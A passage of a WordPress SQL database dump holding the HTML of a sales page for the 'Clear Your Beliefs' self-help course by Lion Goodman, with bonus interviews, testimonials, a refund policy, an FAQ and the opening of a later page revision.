creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 20:42:14', '2014-06-18 01:42:14', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(990, 2, '2014-06-17 20:48:16', '2014-06-18 01:48:16', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes 